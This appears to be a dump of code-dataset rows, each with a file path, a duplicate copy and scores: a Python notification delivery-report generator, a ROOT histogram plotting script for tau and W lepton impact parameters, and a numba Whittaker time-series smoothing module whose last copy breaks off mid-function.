:param to_date: end of month date up to which to generate the report (if this is not specified, it will default to datetime.utcnow())
:param reportfile: file path for existing/new report to be output
:return:
"""
# work out the whole months that we're operating over
frstamp = datetime.strptime(from_date, "%Y-%m-%dT%H:%M:%SZ")
if to_date is None:
tostamp = datetime.utcnow()
else:
tostamp = datetime.strptime(to_date, "%Y-%m-%dT%H:%M:%SZ")
months = range(frstamp.month, tostamp.month + 1)
# prep the data structures where we're going to record the results
result = {}
uniques = {}
for m in months:
uniques[m] = {"md" : 0, "content" : 0}
heis = {}
# go through each routed notification and count against the repository ids whether something is
# a md-only or a with-content notification, and at the same time count the unique md-only vs with-content
# notifications that were routed
q = DeliveryReportQuery(from_date, to_date)
for note in RoutedNotification.scroll(q.query(), page_size=100, keepalive="5m"):
assert isinstance(note, RoutedNotification)
nm = note.analysis_datestamp.month
is_with_content = False
if len(note.links) > 0:
is_with_content = True
uniques[nm]["content"] += 1
else:
uniques[nm]["md"] += 1
for r in note.repositories:
if r not in result:
result[r] = {}
for m in months:
result[r][m] = {"md" : 0, "content" : 0}
if is_with_content:
result[r][nm]["content"] += 1
else:
result[r][nm]["md"] += 1
# now flesh out the report with account names and totals
for k in result.keys():
acc = Account.pull(k)
if acc is None:
heis[k] = k
else:
if acc.repository_name is not None:
heis[k] = acc.repository_name
else:
heis[k] = k
for mon in result[k].keys():
result[k][mon]["total"] = result[k][mon]["md"] + result[k][mon]["content"]
for mon in uniques.keys():
uniques[mon]["total"] = uniques[mon]["md"] + uniques[mon]["content"]
# some constant bits of information we're going to need to convert the results into a table
# suitable for a CSV
month_names = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']
headers = ['HEI','ID',
'Jan md-only', "Jan with-content", "Jan Total",
'Feb md-only', "Feb with-content", "Feb Total",
'Mar md-only', "Mar with-content", "Mar Total",
'Apr md-only', "Apr with-content", "Apr Total",
'May md-only', "May with-content", "May Total",
'Jun md-only', "Jun with-content", "Jun Total",
'Jul md-only', "Jul with-content", "Jul Total",
'Aug md-only', "Aug with-content", "Aug Total",
'Sep md-only', "Sep with-content", "Sep Total",
'Oct md-only', "Oct with-content", "Oct Total",
'Nov md-only', "Nov with-content", "Nov Total",
'Dec md-only', "Dec with-content", "Dec Total"]
template = {}
for k in headers:
template[k] = 0
# an interim data-structure that we'll use to store the objects to be written, which we
# can then order by the key (which will be the HEI name)
data = {}
# read any existing data in from the current spreadsheet
if os.path.exists(reportfile):
sofar = clcsv.ClCsv(file_path=reportfile)
for obj in sofar.objects():
# convert all the fields to integers as needed
for k in obj.keys():
if k not in ["HEI", "ID"]:
if obj[k] == "":
obj[k] = 0
else:
try:
obj[k] = int(obj[k])
except:
app.logger.warn(u"Unable to coerce existing report value '{x}' to an integer, so assuming it is 0".format(x=obj[k]))
obj[k] = 0
data[obj.get("HEI")] = obj
# now add any new data from the report
for id, res in result.iteritems():
hei = heis.get(id)
if hei not in data:
data[hei] = deepcopy(template)
data[hei]["HEI"] = hei
data[hei]["ID"] = id
for mon, info in res.iteritems():
mn = month_names[mon - 1]
mdk = mn + " md-only"
ctk = mn + " with-content"
tk = mn + " Total"
data[hei][mdk] = info.get("md")
data[hei][ctk] = info.get("content")
data[hei][tk] = info.get("total")
# remove the "total" and "unique" entries, as we need to re-create them
if "Total" in data:
del data["Total"]
existing_unique = deepcopy(template)
existing_unique["HEI"] = "Unique"
existing_unique["ID"] = ""
if "Unique" in data:
existing_unique = data["Unique"]
del data["Unique"]
# calculate the totals for all columns
totals = {}
for k in headers:
totals[k] = 0
totals["HEI"] = "Total"
totals["ID"] = ""
for hei, obj in data.iteritems():
for k, v in obj.iteritems():
if k in ["HEI", "ID"]:
continue
if isinstance(v, int):
totals[k] += v
data["Total"] = totals
# add the uniques
data["Unique"] = existing_unique
data["Unique"]["HEI"] = "Unique"
for mon, info in uniques.iteritems():
mn = month_names[mon - 1]
mdk = mn + " md-only"
ctk = mn + " with-content"
tk = mn + " Total"
data["Unique"][mdk] = info.get("md")
data["Unique"][ctk] = info.get("content")
data["Unique"][tk] = info.get("total")
orderedkeys = data.keys()
orderedkeys.remove('Unique')
orderedkeys.remove('Total')
orderedkeys.sort()
orderedkeys.append('Total')
orderedkeys.append('Unique')
# remove the old report file, so we can start with a fresh new one
try:
os.remove(reportfile)
except:
pass
out = clcsv.ClCsv(file_path=reportfile)
out.set_headers(headers)
for hk in orderedkeys:
hei = data[hk]
out.add_object(hei)
out.save()
class DeliveryReportQuery(object):
def __init__(self, from_date, to_date):
self.from_date = from_date
self.to_date = to_date
def query(self):
return {
"query" : {
"bool" : {
"must" : [
{
"range" : {
"analysis_date" : {
"gte" : self.from_date,
"lt" : self.to_date
}
}
}
]
}
},
"sort" : [
{"analysis_date" : {"order" : "asc"}}
]
} | 0.353651 | 0.364947 |
from ROOT import *
gROOT.SetBatch()
gROOT.LoadMacro( "AtlasStyle.C" )
gROOT.LoadMacro( "AtlasLabels.C" )
SetAtlasStyle()
#====================================================
# FUNCTION TO MAKE CANVAS
#====================================================
def MakeCanvas( split = 0.25 ):
c = TCanvas( "DataPrediction", "Data/Prediction", 800, 800 )
pad0 = TPad("pad0","pad0", 0.0, 0.273, 1.0, 1.00)
pad1 = TPad("pad1","pad1", 0.0, 0.008, 1.0, 0.272)
pad0.SetBottomMargin(0.001)
pad0.SetBorderMode(0)
pad1.SetBottomMargin(0.45)
pad0.SetTicks(1,1)
pad1.SetTicks(1,1)
pad0.Draw()
pad1.Draw()
pad0.cd()
return c, pad0, pad1
def main():
#====================================================
# PREPARING THE DATA
#====================================================
#Taking the .root file.
f = TFile ("rootfile_name.root")
#Extracting the histograms from the .root file.
variables = [ "d0significance", "z0sintheta" ]
titles = [ "d_0", "z_0 sin #theta" ]
leptons = [ "", "_e", "_mu" ]
#Creating the Canvas.
c, pad0, pad1 = MakeCanvas()
pad0.SetLogy()
#====================================================
# SAVING HISTOGRAMS
#====================================================
f_out = TFile ("comparison_histograms.root", "recreate")
ratios = []
for variable in variables:
if variable == "d0significance":
title = "d_{0}"
else:
title = "z_{0} sin #theta"
for lepton in leptons:
hname_tau = "h_tau_" + variable + lepton
hname_W = "h_W_" + variable + lepton
h_tau = f.Get( hname_tau )
h_tau.Rebin(4)
h_tau.Scale( 1. / h_tau.Integral() )
h_tau.SetLineColor( kRed )
h_tau.SetMarkerColor( kRed )
h_tau.SetTitle( "leptons from #tau " )
h_tau.GetXaxis().SetTitle( title )
h_tau.GetXaxis().SetTitleSize(.15)
h_tau.GetYaxis().SetTitle( "Events" )
h_tau.GetYaxis().SetLabelSize(.040)
h_W = f.Get( hname_W )
h_W.Rebin(4)
h_W.Scale( 1. / h_W.Integral() )
h_W.GetXaxis().SetTitle( title )
h_W.GetYaxis().SetTitle( "Events" )
h_W.SetTitle( "leptons from W" )
h_W.GetYaxis().SetLabelSize(.040)
h_ratio = h_tau.Clone()
h_ratio.GetYaxis().SetTitle( "#tau / W" )
h_ratio.GetYaxis().SetTitleSize(.15)
h_ratio.GetYaxis().SetTitleOffset(.48)
h_ratio.GetYaxis().SetLabelSize(.1)
h_ratio.GetYaxis().SetLabelOffset(.03)
h_ratio.GetYaxis().SetNdivisions(5)
h_ratio.GetXaxis().SetLabelSize(.10)
h_ratio.GetXaxis().SetLabelOffset(.07)
h_ratio.Divide( h_W )
h_ratio.SetDirectory( f_out )
pad0.cd()
h_W.Draw( "hist" )
h_tau.Draw( "hist same" )
#TLegend settings:
leg = TLegend(0.17,0.7,0.48,0.9)
leg.SetFillColor(0)
leg.SetFillStyle(0)
leg.SetLineColor(0)
leg.SetBorderSize(0)
leg.SetTextFont(42)
leg.SetTextSize(0.04)
leg.AddEntry(h_W,"Leptons from W")
leg.AddEntry(h_tau,"Leptons from #tau")
leg.Draw()
ATLASLabel( 0.65, 0.8, "Internal" )
pad1.cd()
h_ratio.Draw( "" )
ratios.append( h_ratio )
c.Print( variable + lepton + ".pdf" )
c.Print( variable + lepton + ".root" )
f_out.Write()
f_out.Close()
if __name__ == "__main__":
main() | scripts/python/data analysis/impact parameters/compare_plots.py | from ROOT import *
gROOT.SetBatch()
gROOT.LoadMacro( "AtlasStyle.C" )
gROOT.LoadMacro( "AtlasLabels.C" )
SetAtlasStyle()
#====================================================
# FUNCTION TO MAKE CANVAS
#====================================================
def MakeCanvas( split = 0.25 ):
c = TCanvas( "DataPrediction", "Data/Prediction", 800, 800 )
pad0 = TPad("pad0","pad0", 0.0, 0.273, 1.0, 1.00)
pad1 = TPad("pad1","pad1", 0.0, 0.008, 1.0, 0.272)
pad0.SetBottomMargin(0.001)
pad0.SetBorderMode(0)
pad1.SetBottomMargin(0.45)
pad0.SetTicks(1,1)
pad1.SetTicks(1,1)
pad0.Draw()
pad1.Draw()
pad0.cd()
return c, pad0, pad1
def main():
#====================================================
# PREPARING THE DATA
#====================================================
#Taking the .root file.
f = TFile ("rootfile_name.root")
#Extracting the histograms from the .root file.
variables = [ "d0significance", "z0sintheta" ]
titles = [ "d_0", "z_0 sin #theta" ]
leptons = [ "", "_e", "_mu" ]
#Creating the Canvas.
c, pad0, pad1 = MakeCanvas()
pad0.SetLogy()
#====================================================
# SAVING HISTOGRAMS
#====================================================
f_out = TFile ("comparison_histograms.root", "recreate")
ratios = []
for variable in variables:
if variable == "d0significance":
title = "d_{0}"
else:
title = "z_{0} sin #theta"
for lepton in leptons:
hname_tau = "h_tau_" + variable + lepton
hname_W = "h_W_" + variable + lepton
h_tau = f.Get( hname_tau )
h_tau.Rebin(4)
h_tau.Scale( 1. / h_tau.Integral() )
h_tau.SetLineColor( kRed )
h_tau.SetMarkerColor( kRed )
h_tau.SetTitle( "leptons from #tau " )
h_tau.GetXaxis().SetTitle( title )
h_tau.GetXaxis().SetTitleSize(.15)
h_tau.GetYaxis().SetTitle( "Events" )
h_tau.GetYaxis().SetLabelSize(.040)
h_W = f.Get( hname_W )
h_W.Rebin(4)
h_W.Scale( 1. / h_W.Integral() )
h_W.GetXaxis().SetTitle( title )
h_W.GetYaxis().SetTitle( "Events" )
h_W.SetTitle( "leptons from W" )
h_W.GetYaxis().SetLabelSize(.040)
h_ratio = h_tau.Clone()
h_ratio.GetYaxis().SetTitle( "#tau / W" )
h_ratio.GetYaxis().SetTitleSize(.15)
h_ratio.GetYaxis().SetTitleOffset(.48)
h_ratio.GetYaxis().SetLabelSize(.1)
h_ratio.GetYaxis().SetLabelOffset(.03)
h_ratio.GetYaxis().SetNdivisions(5)
h_ratio.GetXaxis().SetLabelSize(.10)
h_ratio.GetXaxis().SetLabelOffset(.07)
h_ratio.Divide( h_W )
h_ratio.SetDirectory( f_out )
pad0.cd()
h_W.Draw( "hist" )
h_tau.Draw( "hist same" )
#TLegend settings:
leg = TLegend(0.17,0.7,0.48,0.9)
leg.SetFillColor(0)
leg.SetFillStyle(0)
leg.SetLineColor(0)
leg.SetBorderSize(0)
leg.SetTextFont(42)
leg.SetTextSize(0.04)
leg.AddEntry(h_W,"Leptons from W")
leg.AddEntry(h_tau,"Leptons from #tau")
leg.Draw()
ATLASLabel( 0.65, 0.8, "Internal" )
pad1.cd()
h_ratio.Draw( "" )
ratios.append( h_ratio )
c.Print( variable + lepton + ".pdf" )
c.Print( variable + lepton + ".root" )
f_out.Write()
f_out.Close()
if __name__ == "__main__":
main() | 0.413359 | 0.160496 |
# pyright: reportGeneralTypeIssues=false
# pylint: disable=C0103,C0301,E0401,R0912,R0913,R0914,R0915
from math import log, pow, sqrt # pylint: disable=W0622
from typing import Union
import numpy
import xarray
from numba import guvectorize, njit
from numba.core.types import float64, int16, int32, uint8
@njit
def ws2d(y, lmda, w):
"""
Whittaker filter with differences of 2nd order.
Args:
y (numpy.array): raw data array (1d, expected in float64)
lmda (double): S value
w (numpy.array): weights vector (1d, expected in float64)
Returns:
z (numpy.array): smoothed data array (1d)
"""
n = y.shape[0]
m = n - 1
z = numpy.zeros(n)
d = z.copy()
c = z.copy()
e = z.copy()
d[0] = w[0] + lmda
c[0] = (-2 * lmda) / d[0]
e[0] = lmda / d[0]
z[0] = w[0] * y[0]
d[1] = w[1] + 5 * lmda - d[0] * (c[0] * c[0])
c[1] = (-4 * lmda - d[0] * c[0] * e[0]) / d[1]
e[1] = lmda / d[1]
z[1] = w[1] * y[1] - c[0] * z[0]
for i in range(2, m - 1):
i1 = i - 1
i2 = i - 2
d[i] = w[i] + 6 * lmda - (c[i1] * c[i1]) * d[i1] - (e[i2] * e[i2]) * d[i2]
c[i] = (-4 * lmda - d[i1] * c[i1] * e[i1]) / d[i]
e[i] = lmda / d[i]
z[i] = w[i] * y[i] - c[i1] * z[i1] - e[i2] * z[i2]
i1 = m - 2
i2 = m - 3
d[m - 1] = w[m - 1] + 5 * lmda - (c[i1] * c[i1]) * d[i1] - (e[i2] * e[i2]) * d[i2]
c[m - 1] = (-2 * lmda - d[i1] * c[i1] * e[i1]) / d[m - 1]
z[m - 1] = w[m - 1] * y[m - 1] - c[i1] * z[i1] - e[i2] * z[i2]
i1 = m - 1
i2 = m - 2
d[m] = w[m] + lmda - (c[i1] * c[i1]) * d[i1] - (e[i2] * e[i2]) * d[i2]
z[m] = (w[m] * y[m] - c[i1] * z[i1] - e[i2] * z[i2]) / d[m]
z[m - 1] = z[m - 1] / d[m - 1] - c[m - 1] * z[m]
for i in range(m - 2, -1, -1):
z[i] = z[i] / d[i] - c[i] * z[i + 1] - e[i] * z[i + 2]
return z
@guvectorize(
[(float64[:], float64, float64, int16[:])], "(n),(),() -> (n)", nopython=True
)
def ws2dgu(y, lmda, nodata, out):
"""
Whittaker smoother with fixed lambda (S).
Args:
y: time-series numpy array
l: smoothing parameter lambda (S)
w: weights numpy array
p: "Envelope" value
Returns:
Smoothed time-series array z
"""
m = y.shape[0]
w = numpy.zeros(y.shape, dtype=float64)
n = 0
for ii in range(m):
if y[ii] == nodata:
w[ii] = 0
else:
n += 1
w[ii] = 1
if n > 1:
z = ws2d(y, lmda, w)
numpy.round_(z, 0, out)
else:
out[:] = y[:]
@guvectorize(
[(float64[:], float64, float64, float64, int16[:])],
"(n),(),(),() -> (n)",
nopython=True,
)
def ws2dpgu(y, lmda, nodata, p, out):
"""
Whittaker smoother with asymmetric smoothing and fixed lambda (S).
Args:
y: time-series numpy array
l: smoothing parameter lambda (S)
w: weights numpy array
p: "Envelope" value
Returns:
Smoothed time-series array z
"""
w = numpy.zeros(y.shape, dtype=float64)
m = y.shape[0]
n = 0
for ii in range(m):
if y[ii] == nodata:
w[ii] = 0
else:
n += 1
w[ii] = 1
if n > 1:
p1 = 1 - p
z = numpy.zeros(m)
znew = numpy.zeros(m)
wa = numpy.zeros(m)
ww = numpy.zeros(m)
# Calculate weights
for _ in range(10):
for j in range(m):
y_tmp = y[j]
z_tmp = z[j]
if y_tmp > z_tmp:
wa[j] = p
else:
wa[j] = p1
ww[j] = w[j] * wa[j]
znew[:] = ws2d(y, lmda, ww)
z_tmp = 0.0
j = 0
for j in range(m):
z_tmp += abs(znew[j] - z[j])
if z_tmp == 0.0:
break
z[:] = znew[:]
z = ws2d(y, lmda, ww)
numpy.round_(z, 0, out)
else:
out[:] = y[:]
@guvectorize(
[(float64[:], float64, float64[:], int16[:], float64[:])],
"(n),(),(m) -> (n),()",
nopython=True,
)
def ws2doptv(y, nodata, llas, out, lopt):
"""
Whittaker filter V-curve optimization of S.
Args:
y (numpy.array): raw data array (1d, expected in float64)
nodata (double, int): nodata value
llas (numpy.array): 1d array of s values to use for optimization
"""
m = y.shape[0]
w = numpy.zeros(y.shape, dtype=float64)
n = 0
for ii in range(m):
if y[ii] == nodata:
w[ii] = 0
else:
n += 1
w[ii] = 1
if n > 1:
m1 = m - 1
m2 = m - 2
nl = len(llas)
nl1 = nl - 1
i = 0
k = 0
fits = numpy.zeros(nl)
pens = numpy.zeros(nl)
z = numpy.zeros(m)
diff1 = numpy.zeros(m1)
lamids = numpy.zeros(nl1)
v = numpy.zeros(nl1)
# Compute v-curve
for lix in range(nl):
lmda = pow(10, llas[lix])
z[:] = ws2d(y, lmda, w)
for i in range(m):
w_tmp = w[i]
y_tmp = y[i]
z_tmp = z[i]
fits[lix] += pow(w_tmp * (y_tmp - z_tmp), 2)
fits[lix] = log(fits[lix])
for i in range(m1):
z_tmp = z[i]
z2 = z[i + 1]
diff1[i] = z2 - z_tmp
for i in range(m2):
z_tmp = diff1[i]
z2 = diff1[i + 1]
pens[lix] += pow(z2 - z_tmp, 2)
pens[lix] = log(pens[lix])
# Construct v-curve
llastep = llas[1] - llas[0]
for i in range(nl1):
l1 = llas[i]
l2 = llas[i + 1]
f1 = fits[i]
f2 = fits[i + 1]
p1 = pens[i]
p2 = pens[i + 1]
v[i] = sqrt(pow(f2 - f1, 2) + pow(p2 - p1, 2)) / (log(10) * llastep)
lamids[i] = (l1 + l2) / 2
vmin = v[k]
for i in range(1, nl1):
if v[i] < vmin:
vmin = v[i]
k = i
lopt[0] = pow(10, lamids[k])
z = ws2d(y, lopt[0], w)
numpy.round_(z, 0, out)
else:
out[:] = y[:]
lopt[0] = 0.0
@guvectorize(
[(float64[:], float64, float64, float64[:], int16[:], float64[:])],
"(n),(),(),(m) -> (n),()",
nopython=True,
)
def ws2doptvp(y, nodata, p, llas, out, lopt):
"""
Whittaker filter V-curve optimization of S and asymmetric weights.
Args:
y (numpy.array): raw data array (1d, expected in float64)
nodata (double, int): nodata value
p (float): Envelope value for asymmetric weights
llas (numpy.array): 1d array of s values to use for optimization
"""
m = y.shape[0]
w = numpy.zeros(y.shape, dtype=float64)
n = 0
for ii in range(m):
if y[ii] == nodata:
w[ii] = 0
else:
n += 1
w[ii] = 1
if n > 1:
m1 = m - 1
m2 = m - 2
nl = len(llas)
nl1 = nl - 1
i = 0
k = 0
j = 0
p1 = 1 - p
fits = numpy.zeros(nl)
pens = numpy.zeros(nl)
z = numpy.zeros(m)
znew = numpy.zeros(m)
diff1 = numpy.zeros(m1)
lamids = numpy.zeros(nl1)
v = numpy.zeros(nl1)
wa = numpy.zeros(m)
ww = numpy.zeros(m)
# Compute v-curve
for lix in range(nl):
lmda = pow(10, llas[lix])
for i in range(10):
for j in range(m):
y_tmp = y[j]
z_tmp = z[j]
if y_tmp > z_tmp:
wa[j] = p
else:
wa[j] = p1
ww[j] = w[j] * wa[j]
znew[:] = ws2d(y, lmda, ww)
z_tmp = 0.0
j = 0
for j in range(m):
z_tmp += abs(znew[j] - z[j])
if z_tmp == 0.0:
break
z[0:m] = znew[0:m]
for i in range(m):
w_tmp = w[i]
y_tmp = y[i]
z_tmp = z[i]
fits[lix] += pow(w_tmp * (y_tmp - z_tmp), 2)
fits[lix] = log(fits[lix])
for i in range(m1):
z_tmp = z[i]
z2 = z[i + 1]
diff1[i] = z2 - z_tmp
for i in range(m2):
z_tmp = diff1[i]
z2 = diff1[i + 1]
pens[lix] += pow(z2 - z_tmp, 2)
pens[lix] = log(pens[lix])
# Construct v-curve
llastep = llas[1] - llas[0]
for i in range(nl1):
l1 = llas[i]
l2 = llas[i + 1]
fit1 = fits[i]
fit2 = fits[i + 1]
pen1 = pens[i]
pen2 = pens[i + 1]
v[i] = sqrt(pow(fit2 - fit1, 2) + pow(pen2 - pen1, 2)) / (log(10) * llastep)
lamids[i] = (l1 + l2) / 2
vmin = v[k]
for i in range(1, nl1):
if v[i] < vmin:
vmin = v[i]
k = i
lopt[0] = pow(10, lamids[k])
z[:] = 0.0
for i in range(10):
for j in range(m):
y_tmp = y[j]
z_tmp = z[j]
if y_tmp > z_tmp:
wa[j] = p
else:
wa[j] = p1
ww[j] = w[j] * wa[j]
znew[0:m] = ws2d(y, lopt[0], ww)
z_tmp = 0.0
j = 0
for j in range(m):
z_tmp += abs(znew[j] - z[j])
if z_tmp == 0.0:
break
z[0:m] = znew[0:m]
z = ws2d(y, lopt[0], ww)
numpy.round_(z, 0, out)
else:
out[:] = y[:]
lopt[0] = 0.0
@guvectorize(
[(int16[:], float64, float64, float64, int16[:], float64[:])],
"(n),(),(),() -> (n),()",
nopython=True,
)
def ws2doptvplc(y, nodata, p, lc, out, lopt):
"""
Whittaker filter V-curve optimization.
Whittaker filter V-curve optimization of S, asymmetric weights and
srange determined by autocorrelation.
Args:
y (numpy.array): raw data array (1d, expected in float64)
nodata (double, int): nodata value
p (float): Envelope value for asymmetric weights
lc (float): lag1 autocorrelation
"""
m = y.shape[0]
w = numpy.zeros(y.shape, dtype=float64)
n = 0
for ii in range(m):
if y[ii] == nodata:
w[ii] = 0
else:
n += 1
w[ii] = 1
if n > 1:
if lc > 0.5:
llas = numpy.arange(-2, 1.2, 0.2, dtype=float64)
elif lc <= 0.5:
llas = numpy.arange(0, 3.2, 0.2, dtype=float64)
else:
llas = numpy.arange(-1, 1.2, 0.2, dtype=float64)
m1 = m - 1
m2 = m - 2
nl = len(llas)
nl1 = nl - 1
i = 0
k = 0
j = 0
p1 = 1 - p
fits = numpy.zeros(nl)
pens = numpy.zeros(nl)
z = numpy.zeros(m)
znew = numpy.zeros(m)
diff1 = numpy.zeros(m1)
lamids = numpy.zeros(nl1)
v = numpy.zeros(nl1)
wa = numpy.zeros(m)
ww = numpy.zeros(m)
# Compute v-curve
for lix in range(nl):
lmda = pow(10, llas[lix])
for i in range(10):
for j in range(m):
y_tmp = y[j]
z_tmp = z[j]
if y_tmp > z_tmp:
wa[j] = p
else:
wa[j] = p1
ww[j] = w[j] * wa[j]
znew[:] = ws2d(y, lmda, ww)
z_tmp = 0.0
j = 0
for j in range(m):
z_tmp += abs(znew[j] - z[j])
if z_tmp == 0.0:
break
z[0:m] = znew[0:m]
for i in range(m):
w_tmp = w[i]
y_tmp = y[i]
z_tmp = z[i]
fits[lix] += pow(w_tmp * (y_tmp - z_tmp), 2)
fits[lix] = log(fits[lix])
for i in range(m1):
z_tmp = z[i]
z2 = z[i + 1]
diff1[i] = z2 - z_tmp
for i in range(m2):
z_tmp = diff1[i]
z2 = diff1[i + 1]
pens[lix] += pow(z2 - z_tmp, 2)
pens[lix] = log(pens[lix])
# Construct v-curve
llastep = llas[1] - llas[0]
for i in range(nl1):
l1 = llas[i]
l2 = llas[i + 1]
fit1 = fits[i]
fit2 = fits[i + 1]
pen1 = pens[i]
pen2 = pens[i + 1]
v[i] = sqrt(pow(fit2 - fit1, 2) + pow(pen2 - pen1, 2)) / (log(10) * llastep)
lamids[i] = (l1 + l2) / 2
vmin = v[k]
for i in range(1, nl1):
if v[i] < vmin:
vmin = v[i]
k = i
lopt[0] = pow(10, lamids[k])
z[:] = 0.0
for i in range(10):
for j in range(m):
y_tmp = y[j]
z_tmp = z[j]
if y_tmp > z_tmp:
wa[j] = p
else:
wa[j] = p1
ww[j] = w[j] * wa[j]
znew[0:m] = ws2d(y, lopt[0], ww)
z_tmp = 0.0
j = 0
for j in range(m):
z_tmp += abs(znew[j] - z[j])
if z_tmp == 0.0:
break
z[0:m] = znew[0:m]
z = ws2d(y, lopt[0], ww)
numpy.round_(z, 0, out)
else:
out[:] = y[:]
lopt[0] = 0.0
def whits(
ds: xarray.Dataset,
dim: str,
nodata: Union[int, float],
sg: xarray.DataArray = None,
s: float = None,
p: float = None,
) -> xarray.Dataset:
"""
Apply whittaker with fixed S.
Fixed S can be either provided as constant or
as sgrid with a constant per pixel
Args:
ds: input dataset,
dim: dimension to use for filtering
nodata: nodata value
sg: sgrid,
s: S value
p: Envelope value for asymmetric weights
Returns:
ds_out: xarray.Dataset with smoothed data
"""
if sg is None and s is None:
raise ValueError("Need S or sgrid")
lmda = sg if sg is not None else s
if p is not None:
xout = xarray.apply_ufunc(
ws2dpgu,
ds[dim],
lmda,
nodata,
p,
input_core_dims=[["time"], [], [], []],
output_core_dims=[["time"]],
dask="parallelized",
keep_attrs=True,
)
else:
xout = xarray.apply_ufunc(
ws2dgu,
ds[dim],
lmda,
nodata,
input_core_dims=[["time"], [], []],
output_core_dims=[["time"]],
dask="parallelized",
keep_attrs=True,
)
return xout
def whitsvc(
ds: xarray.Dataset,
dim: str,
nodata: Union[int, float],
lc: xarray.DataArray = None,
srange: numpy.ndarray = None,
p: float = None,
) -> xarray.Dataset:
"""
Apply whittaker with V-curve optimization of S.
Args:
ds: input dataset,
dim: dimension to use for filtering
nodata: nodata value
lc: lag1 autocorrelation DataArray,
srange: values of S for V-curve optimization (mandatory if no autocorrelation raster)
p: Envelope value for asymmetric weights
Returns:
ds_out: xarray.Dataset with smoothed data and sgrid
"""
if lc is not None:
if p is None:
raise ValueError("If lc is set, a p value needs to be specified as well.")
ds_out, sgrid = xarray.apply_ufunc(
ws2doptvplc,
ds[dim],
nodata,
p,
lc,
input_core_dims=[["time"], [], [], []],
output_core_dims=[["time"], []],
dask="parallelized",
keep_attrs=True,
)
else:
if srange is None:
raise ValueError("Need either lagcorr or srange!")
if p:
ds_out, sgrid = xarray.apply_ufunc(
ws2doptvp,
ds[dim],
nodata,
p,
srange,
input_core_dims=[["time"], [], [], ["dim0"]],
output_core_dims=[["time"], []],
dask="parallelized",
keep_attrs=True,
)
else:
ds_out, sgrid = xarray.apply_ufunc(
ws2doptv,
ds[dim],
nodata,
srange,
input_core_dims=[["time"], [], ["dim0"]],
output_core_dims=[["time"], []],
dask="parallelized",
keep_attrs=True,
)
ds_out = ds_out.to_dataset()
ds_out["sgrid"] = numpy.log10(sgrid).astype("float32")
return ds_out
def whitint(
ds: xarray.Dataset, dim: str, labels_daily: numpy.ndarray, template: numpy.ndarray
):
"""Perform temporal interpolation using the Whittaker filter."""
template_out = numpy.zeros(numpy.unique(labels_daily).size, dtype="u1")
ds_out = xarray.apply_ufunc(
tinterpolate,
ds[dim],
template,
labels_daily,
template_out,
input_core_dims=[["time"], ["dim0"], ["dim1"], ["dim2"]],
output_core_dims=[["newtime"]],
dask_gufunc_kwargs={"output_sizes": {"newtime": template_out.size}},
output_dtypes=["int16"],
dask="parallelized",
keep_attrs=True,
)
return ds_out
@njit
def autocorr(x):
"""
Calculate Lag-1 autocorrelation.
Adapted from https://stackoverflow.com/a/29194624/5997555
Args:
x: 3d data array
Returns:
Lag-1 autocorrelation array
"""
r, c, t = x.shape
z = numpy.zeros((r, c), dtype="float32")
M = t - 1
for rr in range(r):
for cc in range(c):
data1 = x[rr, cc, 1:]
data2 = x[rr, cc, :-1]
sum1 = 0.0
sum2 = 0.0
for i in range(M):
sum1 += data1[i]
sum2 += data2[i]
mean1 = sum1 / M
mean2 = sum2 / M
var_sum1 = 0.0
var_sum2 = 0.0
cross_sum = 0.0
for i in range(M):
var_sum1 += (data1[i] - mean1) ** 2
var_sum2 += (data2[i] - mean2) ** 2
cross_sum += data1[i] * data2[i]
std1 = (var_sum1 / M) ** 0.5
std2 = (var_sum2 / M) ** 0.5
cross_mean = cross_sum / M
if std1 != 0 and std2 != 0:
lc = (cross_mean - mean1 * mean2) / (std1 * std2)
else:
lc = 0.0
z[rr, cc] = lc
return z
def lag1corr(ds: xarray.Dataset, dim: str):
"""
Xarray wrapper for autocorr.
Args:
ds: input dataset,
dim: dimension to use for calculation
Returns:
xarray.DataArray with lag1 autocorrelation
"""
return xarray.apply_ufunc(
autocorr,
ds[dim],
input_core_dims=[["time"]],
dask="parallelized",
output_dtypes=["float32"],
)
@guvectorize(
[(int16[:], float64[:], int32[:], uint8[:], int16[:])],
"(n),(m),(m),(l) -> (l)",
nopython=True,
)
def tinterpolate(x, template, labels, template_out, out): # pylint: disable=W0613
"""
Temporal interpolation of smoothed data.
Args:
x: smoothed data
template: zeros array in daily length with 1s marking smoothed data
labels: array of labels for grouping of length equal to template
template_out: helper array to determine the length of output array
"""
temp = template.copy()
w = template.copy()
ii = 0
jj = 0
for tt in temp:
if tt != 0:
temp[ii] = x[jj]
jj += 1
ii += 1
temp[-1] = x[-1]
z = ws2d(temp, 0.00001, w)
ii = 1
jj = 1
kk = 0
v = z[0]
for ll in labels[1:]:
if ll == labels[ii - 1]:
v += z[ii]
jj += 1
else:
out[kk] = round(v / jj)
kk += 1
jj = 1
v = z[ii]
ii += 1
out[kk] = round(v / jj) | seasmon_xr/ops/whit.py | # pyright: reportGeneralTypeIssues=false
# pylint: disable=C0103,C0301,E0401,R0912,R0913,R0914,R0915
from math import log, pow, sqrt # pylint: disable=W0622
from typing import Union
import numpy
import xarray
from numba import guvectorize, njit
from numba.core.types import float64, int16, int32, uint8
@njit
def ws2d(y, lmda, w):
"""
Whittaker filter with differences of 2nd order.
Args:
y (numpy.array): raw data array (1d, expected in float64)
lmda (double): S value
w (numpy.array): weights vector (1d, expected in float64)
Returns:
z (numpy.array): smoothed data array (1d)
"""
n = y.shape[0]
m = n - 1
z = numpy.zeros(n)
d = z.copy()
c = z.copy()
e = z.copy()
d[0] = w[0] + lmda
c[0] = (-2 * lmda) / d[0]
e[0] = lmda / d[0]
z[0] = w[0] * y[0]
d[1] = w[1] + 5 * lmda - d[0] * (c[0] * c[0])
c[1] = (-4 * lmda - d[0] * c[0] * e[0]) / d[1]
e[1] = lmda / d[1]
z[1] = w[1] * y[1] - c[0] * z[0]
for i in range(2, m - 1):
i1 = i - 1
i2 = i - 2
d[i] = w[i] + 6 * lmda - (c[i1] * c[i1]) * d[i1] - (e[i2] * e[i2]) * d[i2]
c[i] = (-4 * lmda - d[i1] * c[i1] * e[i1]) / d[i]
e[i] = lmda / d[i]
z[i] = w[i] * y[i] - c[i1] * z[i1] - e[i2] * z[i2]
i1 = m - 2
i2 = m - 3
d[m - 1] = w[m - 1] + 5 * lmda - (c[i1] * c[i1]) * d[i1] - (e[i2] * e[i2]) * d[i2]
c[m - 1] = (-2 * lmda - d[i1] * c[i1] * e[i1]) / d[m - 1]
z[m - 1] = w[m - 1] * y[m - 1] - c[i1] * z[i1] - e[i2] * z[i2]
i1 = m - 1
i2 = m - 2
